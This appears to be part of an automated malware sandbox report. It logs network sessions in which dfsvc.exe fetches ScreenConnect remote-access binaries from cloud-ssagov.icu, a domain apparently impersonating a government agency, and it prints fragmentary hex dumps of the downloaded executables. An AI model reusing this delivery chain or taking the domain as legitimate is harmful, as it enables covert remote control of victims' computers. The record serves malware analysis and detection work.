2024-11-13 17:18:14 UTC	16150	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7f da 6f e6 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 40 00 00 00 d4 00 00 00 00 00 00 e6 5e 00 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 01 00 00 02 00 00 d5 24 02 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELo"0@^ `@ `$@
2024-11-13 17:18:14 UTC	16384	IN	Data Raw: 00 29 01 00 24 39 37 33 35 31 30 64 62 2d 37 64 37 66 2d 34 35 32 62 2d 38 39 37 35 2d 37 34 61 38 35 38 32 38 64 33 35 34 00 00 13 01 00 02 00 00 00 04 54 65 78 74 05 53 74 61 74 65 00 00 08 01 00 0b 00 00 00 00 00 00 00 21 b6 ed 55 cc 1c 34 da a9 ba 26 c5 af c0 7a 8b c8 ec 9a 4e 15 f5 57 09 66 f8 54 1e 23 0d 46 8a d0 31 74 fa b5 ce cc c5 f3 48 33 d0 24 1c da b9 2c fd 8f cc 64 34 db dc 2b 01 3d 74 17 8f 7b 58 b2 b0 ad de f3 c1 b0 0d c4 c8 95 65 a5 c1 77 fc 36 28 c5 9d 46 a0 37 b1 94 f6 c6 b6 ea 45 c4 0a 6b d7 09 51 69 f7 bb fd d8 20 8a 15 e8 de 50 11 27 69 e2 f0 72 86 af 63 b6 44 86 66 ff d7 59 27 00 00 00 00 81 c5 e8 85 00 00 00 00 02 00 00 00 7b 00 00 00 18 5e 00 00 18 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: )$973510db-7d7f-452b-8975-74a85828d354TextState!U4&zNWfT#F1tH3$,d4+=t{Xew6(F7EkQi P'ircDfY'{^@
2024-11-13 17:18:14 UTC	16384	IN	Data Raw: f8 ff 52 ce fa ff 53 d0 fd ff 54 d1 fe ff 54 d2 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 d2 ff ff 55 d1 fe ff 54 d0 fd ff 53 cf fb ff 52 cc f8 ff 51 c9 f4 ff 50 c6 f0 ff 4e c2 eb ff 4c bc e5 ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff 4c bc e5 ff 4e c2 eb ff 50 c6 f0 ff 51 c9 f4 ff 52 Data Ascii: RSTTUUTSRQPNL::::::::::::::::::::::::::::::::::::::LNPQR
2024-11-13 17:18:14 UTC	16384	IN	Data Raw: ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 Data Ascii: fffffffffffffffffffggggggggggggggggggggggggggggggggggggggg
2024-11-13 17:18:14 UTC	16384	IN	Data Raw: 00 00 00 00 00 00 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 6e cd f3 ff 85 e0 ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 9a e5 ff ef 00 00 00 00 00 00 00 00 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 cf 00 9f e0 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9f e0 ef 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 cf 00 9f e0 10 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: n
2024-11-13 17:18:14 UTC	2	IN	Data Raw: 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49760	185.49.126.73	443	6996	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-13 17:18:15 UTC	94	OUT	GET /Bin/ScreenConnect.Windows.dll HTTP/1.1 Host: cloud-ssagov.icu Accept-Encoding: gzip
2024-11-13 17:18:15 UTC	236	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 1721856 Content-Type: text/html Server: Microsoft-HTTPAPI/2.0 X-Robots-Tag: noindex X-Content-Type-Options: nosniff Date: Wed, 13 Nov 2024 17:18:15 GMT Connection: close
2024-11-13 17:18:15 UTC	16148	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 79 16 02 e0 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 3e 1a 00 00 06 00 00 00 00 00 00 7e 5d 1a 00 00 20 00 00 00 60 1a 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 1a 00 00 02 00 00 38 00 1b 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELy" 0>~] ` 8@
2024-11-13 17:18:15 UTC	16384	IN	Data Raw: 70 17 8d 15 00 00 01 25 16 09 a2 28 00 02 00 0a 28 93 00 00 0a 14 04 05 16 28 ba 00 00 06 13 06 de 11 09 28 01 02 00 0a dc 06 2c 06 06 6f 11 00 00 0a dc 11 06 2a 00 00 01 34 00 00 02 00 99 00 0a a3 00 0c 00 00 00 00 02 00 81 00 2e af 00 0c 00 00 00 00 02 00 73 00 87 fa 00 07 00 00 00 00 02 00 06 00 fb 01 01 0a 00 00 00 00 13 30 02 00 1f 00 00 00 2a 00 00 11 1f 28 7e 5e 00 00 0a 28 e0 00 00 06 72 71 06 00 70 28 02 02 00 0a 0a 02 06 28 bd 00 00 06 2a 00 13 30 05 00 47 00 00 00 00 00 00 00 03 25 2d 06 26 28 be 00 00 06 18 8d d9 00 00 01 25 16 72 9d 06 00 70 a2 25 17 72 b9 06 00 70 a2 28 03 02 00 0a 7e a7 00 00 04 25 2d 13 26 14 fe 06 04 02 00 0a 73 05 02 00 0a 25 80 a7 00 00 04 02 28 32 00 00 2b 2a 00 1b 30 04 00 90 00 00 00 3a 00 00 11 28 0d 01 00 06 1f 0a Data Ascii: p%((((,o4.s0(~^(rqp((0G%-&(%rp%rp(~%-&s%(2+0:(
2024-11-13 17:18:16 UTC	16384	IN	Data Raw: 00 04 1b 28 aa 01 00 06 7d fc 00 00 04 2b 2e 02 02 7b fc 00 00 04 7d f8 00 00 04 02 17 7d f7 00 00 04 17 2a 02 15 7d f7 00 00 04 02 02 7b fc 00 00 04 18 28 aa 01 00 06 7d fc 00 00 04 02 7b fc 00 00 04 16 d3 28 84 00 00 0a 2d c3 16 2a 1e 02 7b f8 00 00 04 2a 1a 73 7b 01 00 0a 7a 32 02 7b f8 00 00 04 8c ce 00 00 01 2a 00 00 13 30 02 00 3c 00 00 00 88 00 00 11 02 7b f7 00 00 04 1f fe 33 1d 02 7b f9 00 00 04 28 4e 03 00 0a 6f 4f 03 00 0a 33 0b 02 16 7d f7 00 00 04 02 0a 2b 07 16 73 4d 03 00 06 0a 06 02 7b fb 00 00 04 7d fa 00 00 04 06 2a 1e 02 28 53 03 00 06 2a 7a 02 28 2c 00 00 0a 02 03 7d fd 00 00 04 02 28 4e 03 00 0a 6f 4f 03 00 0a 7d ff 00 00 04 2a 06 2a 00 00 00 13 30 05 00 d5 00 00 00 89 00 00 11 02 7b fd 00 00 04 0a 06 2c 09 06 17 3b 8d 00 00 00 16 2a Data Ascii: (}+.{}}}{(}{(-{s{z2{0<{3{(NoO3}+sM{}(Sz(,}(NoO}*0{,;
2024-11-13 17:18:16 UTC	16384	IN	Data Raw: f2 25 56 80 d4 15 f2 25 06 00 af 54 6e 22 06 00 ba 90 6e 22 06 00 71 cc 6e 22 06 00 48 cf 6e 22 06 00 5e 3e 6e 22 06 00 9f a3 6e 22 06 00 c4 b2 a0 02 06 00 36 b2 6e 22 06 00 49 a7 a0 02 06 00 41 a7 6e 22 06 00 81 cc 6e 22 06 00 af 54 6e 22 06 00 ba 90 6e 22 06 00 9f a3 6e 22 06 00 7c aa 6e 22 06 00 f7 cf 71 22 06 00 ce 45 71 22 06 00 66 46 6e 22 06 00 07 59 6e 22 06 00 b6 bf 6e 22 06 00 31 6a 6e 22 06 00 8f 9f 6e 22 06 00 e8 60 6e 22 06 00 48 cf 6e 22 06 00 f4 5f 6e 22 06 00 04 52 25 25 06 00 e3 be 6e 22 06 00 5b be 6e 22 06 10 55 51 f7 25 06 06 80 30 af 08 56 80 80 c8 fb 25 56 80 69 c8 fb 25 06 06 80 30 af 08 56 80 35 9d 00 26 06 06 80 30 af 08 56 80 62 27 05 26 56 80 90 29 05 26 56 80 e3 0d 05 26 56 80 86 29 05 26 06 06 80 30 6e 22 56 80 2c 39 0a 26 56 Data Ascii: %V%Tn"n"qn"Hn"^>n"n"6n"IAn"n"Tn"n"n"\|n"q"Eq"fFn"Yn"n"1jn"n"`n"Hn"_n"R%%n"[n"UQ%0V%Vi%0V5&0Vb'&V)&V&V)&0n"V,9&V
2024-11-13 17:18:16 UTC	16384	IN	Data Raw: 00 00 00 00 c6 00 21 5b 10 00 0e 07 4b a5 00 00 00 00 c6 00 5e 53 10 00 0f 07 5e a5 00 00 00 00 91 18 18 99 0e 27 10 07 6a a5 00 00 00 00 86 18 ed 98 01 00 10 07 72 a5 00 00 00 00 83 00 d7 02 29 3b 10 07 7a a5 00 00 00 00 83 00 81 0a 30 3b 12 07 82 a5 00 00 00 00 86 18 ed 98 01 00 13 07 8a a5 00 00 00 00 83 00 d6 07 1b 3b 13 07 9d a5 00 00 00 00 91 18 18 99 0e 27 14 07 a9 a5 00 00 00 00 86 18 ed 98 01 00 14 07 b1 a5 00 00 00 00 83 00 ab 02 39 3b 14 07 b9 a5 00 00 00 00 83 00 55 0a 39 3b 15 07 c1 a5 00 00 00 00 86 18 ed 98 05 00 16 07 e0 a5 00 00 00 00 e1 01 ac 58 01 00 17 07 18 a6 00 00 00 00 e1 01 37 c2 3d 00 17 07 e4 a7 00 00 00 00 81 00 d5 0d 01 00 17 07 00 a8 00 00 00 00 e1 09 d0 bb e0 18 17 07 08 a8 00 00 00 00 e1 01 13 b6 01 00 17 07 0f a8 00 00 00 Data Ascii: ![K^S^'jr);z0;;'9;U9;X7=
2024-11-13 17:18:16 UTC	16384	IN	Data Raw: 52 0f 3b 10 44 04 5f 46 99 1a 3c 04 86 99 a0 02 3c 04 5b 34 45 10 a9 06 0b 5f 39 02 3c 04 8d 4a a0 02 91 04 5f 46 01 00 89 06 8d 58 39 02 d1 03 86 c7 01 00 69 04 a6 58 01 00 71 09 dc 37 b1 1a 71 09 1c 36 89 01 59 06 ab cc e9 1a e1 02 ed 98 f8 1a e1 02 ed 98 07 1b 41 06 ed 98 10 00 b9 08 ae 9e 16 1b 19 0a 85 3e 1d 1b 29 02 96 4c 7c 04 31 02 ed 98 01 00 99 04 68 53 f5 09 c1 09 21 5b 10 00 39 02 96 4c 7c 04 39 02 35 70 89 01 99 02 e2 6a 7c 04 99 02 28 59 3b 1b b1 07 1b 6b 3d 0b 4c 04 a8 98 5b 00 54 04 b5 bc 49 00 44 02 ab 0d d9 00 08 00 14 00 25 1c 08 00 18 00 2a 1c 08 00 1c 00 2f 1c 08 00 20 00 34 1c 08 00 b8 00 39 1c 0e 00 bc 00 3e 1c 0e 00 c0 00 51 1c 0e 00 c4 00 62 1c 08 00 c8 00 75 1c 08 00 cc 00 7a 1c 0e 00 d0 00 7f 1c 0e 00 d4 00 8e 1c 0e 00 d8 00 9d Data Ascii: R;D_F<<[4E_9<J_FX9iXq7q6YA>)L\|1hS![9L\|95pj\|(Y;k=L[TID%*/ 49>Qbuz
2024-11-13 17:18:16 UTC	16384	IN	Data Raw: 63 65 53 6f 75 72 63 65 73 3e 62 5f 5f 33 5f 31 00 3c 3e 39 5f 5f 31 33 35 5f 31 00 3c 47 65 74 46 75 6c 6c 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 3e 62 5f 5f 31 33 35 5f 31 00 3c 3e 63 5f 5f 44 69 73 70 6c 61 79 43 6c 61 73 73 34 37 5f 31 00 3c 43 6f 6e 6e 65 63 74 53 65 72 76 65 72 43 6c 69 65 6e 74 4e 61 6d 65 64 50 69 70 65 73 3e 67 5f 5f 57 61 69 74 41 6e 64 43 6f 6e 6e 65 63 74 4e 61 6d 65 64 50 69 70 65 7c 39 37 5f 31 00 3c 50 6f 70 75 6c 61 74 65 43 6f 6e 74 65 78 74 4d 65 6e 75 53 74 72 69 70 49 74 65 6d 73 3e 62 5f 5f 37 5f 31 00 3c 3e 39 5f 5f 38 5f 31 00 3c 50 6f 70 75 6c 61 74 65 43 6f 6e 74 65 78 74 4d 65 6e 75 53 74 72 69 70 49 74 65 6d 73 3e 62 5f 5f 38 5f 31 00 3c 3e 39 5f 5f 32 39 5f 31 00 3c 54 72 79 47 65 74 41 63 74 69 76 65 43 6f Data Ascii: ceSources>b__3_1<>9__135_1<GetFullExecutablePath>b__135_1<>c__DisplayClass47_1<ConnectServerClientNamedPipes>g__WaitAndConnectNamedPipe\|97_1<PopulateContextMenuStripItems>b__7_1<>9__8_1<PopulateContextMenuStripItems>b__8_1<>9__29_1<TryGetActiveCo
2024-11-13 17:18:16 UTC	16384	IN	Data Raw: 6e 64 6c 65 00 77 69 6e 64 6f 77 48 61 6e 64 6c 65 00 62 61 73 65 4b 65 79 48 61 6e 64 6c 65 00 6c 69 62 72 61 72 79 48 61 6e 64 6c 65 00 72 65 73 75 6d 65 5f 68 61 6e 64 6c 65 00 54 6f 52 65 63 74 61 6e 67 6c 65 00 47 65 74 43 6c 69 65 6e 74 52 65 63 74 61 6e 67 6c 65 00 47 65 74 57 69 6e 64 6f 77 52 65 63 74 61 6e 67 6c 65 00 72 65 63 74 61 6e 67 6c 65 00 70 44 61 74 61 46 69 6c 65 00 75 6c 6c 54 6f 74 61 6c 50 61 67 65 46 69 6c 65 00 75 6c 6c 41 76 61 69 6c 50 61 67 65 46 69 6c 65 00 43 72 65 61 74 65 46 69 6c 65 00 68 54 65 6d 70 6c 61 74 65 46 69 6c 65 00 44 65 6c 65 74 65 46 69 6c 65 00 4d 6f 76 65 46 69 6c 65 00 70 43 6f 6e 66 69 67 46 69 6c 65 00 54 72 79 55 6e 62 6c 6f 63 6b 46 69 6c 65 00 4c 6f 61 64 52 65 73 6f 75 72 63 65 50 61 63 6b 46 72 6f Data Ascii: ndlewindowHandlebaseKeyHandlelibraryHandleresume_handleToRectangleGetClientRectangleGetWindowRectanglerectanglepDataFileullTotalPageFileullAvailPageFileCreateFilehTemplateFileDeleteFileMoveFilepConfigFileTryUnblockFileLoadResourcePackFro
2024-11-13 17:18:16 UTC	16384	IN	Data Raw: 75 72 72 65 6e 74 54 68 72 65 61 64 44 65 73 6b 74 6f 70 00 3c 39 3e 5f 5f 43 6c 6f 73 65 44 65 73 6b 74 6f 70 00 43 72 65 61 74 65 44 65 73 6b 74 6f 70 00 53 77 69 74 63 68 44 65 73 6b 74 6f 70 00 4f 70 65 6e 44 65 73 6b 74 6f 70 00 6c 70 44 65 73 6b 74 6f 70 00 54 72 79 45 6e 73 75 72 65 54 68 72 65 61 64 4f 6e 49 6e 70 75 74 44 65 73 6b 74 6f 70 00 4f 70 65 6e 49 6e 70 75 74 44 65 73 6b 74 6f 70 00 6c 70 73 7a 44 65 73 6b 74 6f 70 00 64 65 73 6b 74 6f 70 00 65 5f 73 70 00 55 72 69 53 63 68 65 6d 65 48 74 74 70 00 4e 61 74 69 76 65 43 6c 65 61 6e 75 70 00 6c 70 4c 6f 61 64 4f 72 64 65 72 47 72 6f 75 70 00 47 65 74 4c 61 73 74 41 63 74 69 76 65 50 6f 70 75 70 00 41 70 70 44 6f 6d 61 69 6e 53 65 74 75 70 00 70 73 7a 56 65 6e 64 6f 72 53 65 74 75 70 00 66 Data Ascii: urrentThreadDesktop<9>__CloseDesktopCreateDesktopSwitchDesktopOpenDesktoplpDesktopTryEnsureThreadOnInputDesktopOpenInputDesktoplpszDesktopdesktope_spUriSchemeHttpNativeCleanuplpLoadOrderGroupGetLastActivePopupAppDomainSetuppszVendorSetupf
2024-11-13 17:18:16 UTC	16384	IN	Data Raw: 72 43 72 65 61 74 65 52 65 67 69 73 74 72 79 4b 65 79 00 4f 70 65 6e 52 65 67 69 73 74 72 79 4b 65 79 00 43 72 65 61 74 65 50 72 6f 70 65 72 74 79 4b 65 79 00 47 65 74 48 6f 74 6b 65 79 00 53 65 74 48 6f 74 6b 65 79 00 70 77 48 6f 74 6b 65 79 00 53 79 73 74 65 6d 2e 53 65 63 75 72 69 74 79 2e 43 72 79 70 74 6f 67 72 61 70 68 79 00 67 65 74 5f 41 73 73 65 6d 62 6c 79 00 67 65 74 5f 46 6f 6e 74 46 61 6d 69 6c 79 00 44 65 66 61 75 6c 74 46 6f 6e 74 46 61 6d 69 6c 79 00 54 72 79 44 69 73 61 62 6c 65 46 69 6c 65 53 79 73 74 65 6d 52 65 64 69 72 65 63 74 69 6f 6e 54 65 6d 70 6f 72 61 72 69 6c 79 00 73 65 74 5f 52 65 61 64 4f 6e 6c 79 00 44 69 73 70 6f 73 65 51 75 69 65 74 6c 79 00 70 6f 69 6e 74 6c 79 00 53 65 6c 65 63 74 4d 61 6e 79 00 53 68 75 74 64 6f 77 6e Data Ascii: rCreateRegistryKeyOpenRegistryKeyCreatePropertyKeyGetHotkeySetHotkeypwHotkeySystem.Security.Cryptographyget_Assemblyget_FontFamilyDefaultFontFamilyTryDisableFileSystemRedirectionTemporarilyset_ReadOnlyDisposeQuietlypointlySelectManyShutdown

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49761	185.49.126.73	443	6996	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-13 17:18:18 UTC	124	OUT	GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1 Host: cloud-ssagov.icu Accept-Encoding: gzip Connection: Keep-Alive
2024-11-13 17:18:18 UTC	235	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 602392 Content-Type: text/html Server: Microsoft-HTTPAPI/2.0 X-Robots-Tag: noindex X-Content-Type-Options: nosniff Date: Wed, 13 Nov 2024 17:18:18 GMT Connection: close
2024-11-13 17:18:18 UTC	16149	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 db c1 bb 82 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 00 09 00 00 06 00 00 00 00 00 00 a2 19 09 00 00 20 00 00 00 20 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 09 00 00 02 00 00 0b 89 09 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL"0 @ `@
2024-11-13 17:18:18 UTC	16384	IN	Data Raw: 32 00 00 2b 28 ce 01 00 0a 0a 06 25 2d 06 26 7e b1 00 00 0a 2a 00 00 1b 30 06 00 20 0f 00 00 2c 00 00 11 73 b0 07 00 06 0a 06 02 7d 14 03 00 04 28 75 01 00 0a 2c 1c 72 9d 0a 00 70 17 17 28 76 01 00 0a 28 77 01 00 0a 16 8d 11 00 00 01 28 78 01 00 0a 02 17 7d 48 00 00 04 02 28 e4 00 00 06 17 28 cf 01 00 0a 0b 02 28 fd 00 00 06 0c 02 28 dc 00 00 06 7e a9 02 00 04 25 2d 17 26 7e 96 02 00 04 fe 06 2a 07 00 06 73 d0 01 00 0a 25 80 a9 02 00 04 28 33 00 00 2b 6f d1 01 00 0a 0d 38 55 0d 00 00 12 04 09 6f d2 01 00 0a 7d 16 03 00 04 11 04 7b 16 03 00 04 28 2c 00 00 2b 13 05 11 04 7b 16 03 00 04 6f 15 03 00 06 28 3b 06 00 06 13 06 11 04 7b 16 03 00 04 6f 29 03 00 06 28 4f 06 00 06 13 07 11 04 7b 16 03 00 04 6f 2a 03 00 06 28 4f 06 00 06 13 08 11 04 7b 16 03 00 04 6f Data Ascii: 2+(%-&~0 ,s}(u,rp(v(w(x}H((((~%-&~s%(3+o8Uo}{(,+{o(;{o)(O{o*(O{o
2024-11-13 17:18:18 UTC	16384	IN	Data Raw: 26 7e 96 02 00 04 fe 06 62 07 00 06 73 d0 01 00 0a 25 80 e1 02 00 04 28 4b 00 00 2b 7d 72 03 00 04 06 7b 72 03 00 04 2c 60 06 7b 71 03 00 04 2c 47 06 7b 72 03 00 04 28 2c 00 00 2b 18 7d 78 02 00 04 06 fe 06 0e 08 00 06 73 b5 00 00 0a 14 28 b6 00 00 0a 26 06 7b 72 03 00 04 6f 16 03 00 06 06 7b 72 03 00 04 28 2c 00 00 2b 7b 78 02 00 04 19 fe 01 6f 10 03 00 0a 06 7b 72 03 00 04 28 2c 00 00 2b 16 7d 78 02 00 04 2a 00 13 30 03 00 43 00 00 00 46 00 00 11 02 03 28 b3 00 00 06 03 2d 21 02 7b 54 00 00 04 25 2d 04 26 16 2b 05 28 da 00 00 0a 2c 0d 02 7b 54 00 00 04 16 6f a2 00 00 0a 2a 03 2c 14 20 00 00 10 00 17 12 00 fe 15 c4 00 00 1b 06 28 09 06 00 06 2a 22 02 03 28 b1 00 00 06 2a a6 02 7b 5a 00 00 04 28 aa 00 00 06 6f b8 04 00 06 02 04 6f 11 03 00 0a 28 2e 01 00 Data Ascii: &~bs%(K+}r{r,`{q,G{r(,+}xs(&{ro{r(,+{xo{r(,+}x0CF(-!{T%-&+(,{To, ("({Z(oo(.
2024-11-13 17:18:18 UTC	16384	IN	Data Raw: 06 9f 01 00 06 73 1a 04 00 0a 28 ac 00 00 2b 25 0a 28 98 01 00 06 06 a2 28 ad 00 00 2b 25 0b 7d 85 00 00 04 07 a2 2a 52 02 28 97 01 00 06 6f 1c 04 00 0a 2d 06 02 6f 9b 01 00 06 2a 32 02 28 97 01 00 06 6f 1c 04 00 0a 2a 52 03 02 25 fe 07 9a 01 00 06 73 83 01 00 0a 6f 1d 04 00 0a 2a 4e 03 02 fe 06 a0 01 00 06 73 83 01 00 0a 6f 1e 04 00 0a 2a 1e 02 6f 9b 01 00 06 2a 00 13 30 04 00 43 00 00 00 62 00 00 11 73 45 08 00 06 0a 06 03 7d 94 03 00 04 02 7b 88 00 00 04 2d 10 02 7e 1f 04 00 0a 73 20 04 00 0a 7d 88 00 00 04 02 7b 88 00 00 04 06 7b 94 03 00 04 06 fe 06 46 08 00 06 73 21 04 00 0a 28 ae 00 00 2b 2a 1e 02 28 46 00 00 0a 2a 62 02 28 22 04 00 0a 02 03 72 02 20 00 70 28 af 00 00 2b 7d 89 00 00 04 2a 13 30 04 00 70 00 00 00 63 00 00 11 73 47 08 00 06 0a 06 02 Data Ascii: s(+%((+%}R(o-o2(oR%soNsoo0CbsE}{-~s }{{Fs!(+(Fb("r p(+}*0pcsG
2024-11-13 17:18:18 UTC	16384	IN	Data Raw: 16 2a ba 02 03 28 5f 05 00 0a 02 17 28 bb 02 00 06 02 02 28 ac 02 00 06 2d 08 02 28 b8 02 00 06 2d 03 14 2b 06 02 6f 62 04 00 0a 6f c0 02 00 06 2a 5a 02 03 28 60 05 00 0a 02 16 28 bb 02 00 06 02 14 6f c0 02 00 06 2a 00 00 00 13 30 03 00 13 00 00 00 92 00 00 11 02 28 f8 00 00 2b 0a 06 2c 08 06 02 03 6f 61 05 00 0a 2a 00 13 30 02 00 6e 00 00 00 93 00 00 11 02 28 62 05 00 0a 2d 1d 02 28 b0 02 00 06 12 00 fe 15 1d 00 00 01 06 28 63 05 00 0a 2c 07 02 28 b0 02 00 06 2a 02 7b ef 00 00 04 2c 1d 02 28 ae 02 00 06 12 00 fe 15 1d 00 00 01 06 28 63 05 00 0a 2c 07 02 28 ae 02 00 06 2a 02 28 be 01 00 06 12 00 fe 15 1d 00 00 01 06 28 63 05 00 0a 2c 07 02 28 be 01 00 06 2a 02 6f c4 02 00 06 2a 7a 02 7b ef 00 00 04 2c 0f 02 28 a8 02 00 06 2c 07 02 28 a8 02 00 06 2a 02 28 Data Ascii: (_((-(-+oboZ(`(o0(+,oa0n(b-((c,({,((c,(((c,(oz{,(,(*(
2024-11-13 17:18:18 UTC	16384	IN	Data Raw: 04 00 0a a2 25 18 73 2a 04 00 0a 25 18 6f c9 02 00 0a 25 1f 2a 28 34 05 00 06 6f 02 06 00 0a 25 28 04 06 00 0a 6f 13 04 00 0a 0e 04 7e a4 04 00 04 25 2d 17 26 7e a3 04 00 04 fe 06 ed 09 00 06 73 05 06 00 0a 25 80 a4 04 00 04 28 49 01 00 2b 28 4a 01 00 2b a2 6f 40 04 00 0a 06 02 17 14 28 4b 01 00 2b 28 4c 01 00 2b 7d a6 04 00 04 02 06 7b a6 04 00 04 28 4d 01 00 2b 28 5d 04 00 0a 02 06 7b a6 04 00 04 28 4e 01 00 2b 28 5e 04 00 0a 06 06 fe 06 ef 09 00 06 73 83 01 00 0a 7d a7 04 00 04 06 7b a6 04 00 04 06 fe 06 f0 09 00 06 73 5c 04 00 0a 28 4f 01 00 2b 2a 32 02 7b 36 01 00 04 6f 62 04 00 0a 2a 36 02 7b 36 01 00 04 03 6f 00 02 00 0a 2a 1e 02 7b 37 01 00 04 2a 22 02 03 7d 37 01 00 04 2a 00 13 30 05 00 64 00 00 00 00 00 00 00 02 03 04 05 0e 04 28 79 03 00 06 02 Data Ascii: %s%o%(4o%(o~%-&~s%(I+(J+o@(K+(L+}{(M+(]{(N+(^s}{s\(O+2{6ob6{6o{7"}7*0d(y
